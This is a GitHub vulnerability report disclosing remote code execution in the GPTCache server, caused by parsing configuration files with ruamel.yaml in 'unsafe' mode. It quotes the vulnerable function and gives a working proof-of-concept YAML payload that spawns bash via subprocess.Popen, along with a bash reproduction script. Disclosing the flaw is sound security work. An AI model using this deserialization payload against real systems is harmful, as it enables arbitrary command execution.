Skip to content

[vulnerability]: Remote Code Execution (RCE) via Unsafe YAML Deserialization in GPTCache Server #676

Open
Open
[vulnerability]: Remote Code Execution (RCE) via Unsafe YAML Deserialization in GPTCache Server#676
@YLChen-007

Description

@YLChen-007
YLChen-007
opened on Jan 19, 2026

Current Behavior

Description:

Summary

A critical Remote Code Execution (RCE) vulnerability exists in the GPTCache server. The application uses the ruamel.yaml library with typ="unsafe" to parse configuration files. This unsafe deserialization setting allows an attacker to instantiate arbitrary Python objects and execute commands by supplying a malicious YAML configuration file. This vulnerability is triggered when the server is started with the -f or --cache-config-file argument pointing to a crafted YAML file.

Details

The vulnerability is located in the init_similar_cache_from_config function within gptcache/adapter/api.py. When the server initializes, it attempts to load a configuration file if one is provided. The code explicitly initializes the YAML parser with typ="unsafe", which disables standard security protections and allows the construction of arbitrary Python objects during parsing.

Vulnerable Code Snippet:

# gptcache/adapter/api.py

def init_similar_cache_from_config(config_dir: str, cache_obj: Optional[Cache] = None):
    import_ruamel()
    from ruamel.yaml import YAML  # pylint: disable=C0415

    if config_dir:
        with open(config_dir, "r", encoding="utf-8") as f:
            yaml = YAML(typ="unsafe", pure=True)  # <--- VULNERABLE: Unsafe deserialization enabled
            init_conf = yaml.load(f)              # <--- Payload executes here

Because typ="unsafe" is used, the yaml.load(f) call will process specific YAML tags (like !!python/object/apply) and execute the associated Python code immediately.

Expected Behavior

No response

Steps To Reproduce

Prerequisites

  • GPTCache installed (pip install gptcache)
  • ruamel.yaml installed (dependency of GPTCache)
  • openai<1.0.0 (required for GPTCache server to run without error, though RCE triggers regardless)

Steps

  1. Create Malicious Config (poc_exploit.yaml):

    !!python/object/apply:subprocess.Popen
- !!python/tuple
  - /bin/bash
  - -c
  - 'echo "pwned" > /tmp/pwned_gptcache.txt'

  2. Run Exploit:

    # Run the server with the malicious config
# The exploit triggers immediately upon loading the config
python3 -m gptcache_server.server -f poc_exploit.yaml

  3. Verify Impact:

    cat /tmp/pwned_gptcache.txt
# Output: pwned

Automated Reproduction Script

#!/bin/bash
# Ensure gptcache is in python path
export PYTHONPATH=$PYTHONPATH:$(pwd)

# Clean up
rm -f /tmp/pwned_gptcache.txt

# Create payload
cat > poc_exploit.yaml <<EOF
!!python/object/apply:subprocess.Popen
- !!python/tuple
  - /bin/bash
  - -c
  - 'echo "pwned" > /tmp/pwned_gptcache.txt'
EOF

echo "[*] Starting GPTCache server with malicious config..."
# Run with timeout as the server might crash or hang after exploit
timeout 10s python3 -m gptcache_server.server -f poc_exploit.yaml

if [ -f /tmp/pwned_gptcache.txt ]; then
    echo "[+] RCE Successful! File /tmp/pwned_gptcache.txt created."
    cat /tmp/pwned_gptcache.txt
else
    echo "[-] RCE Failed."
fi

Evidence of Screenshot:

Environment



Anything else?


No response
Metadata
Metadata
Assignees
No one assigned
    Labels
    No labels
    No labels
    Type
    No type
    Projects
    No projects
    Milestone
    No milestone
    Relationships
    None yet
    Development
    No branches or pull requests
    Issue actions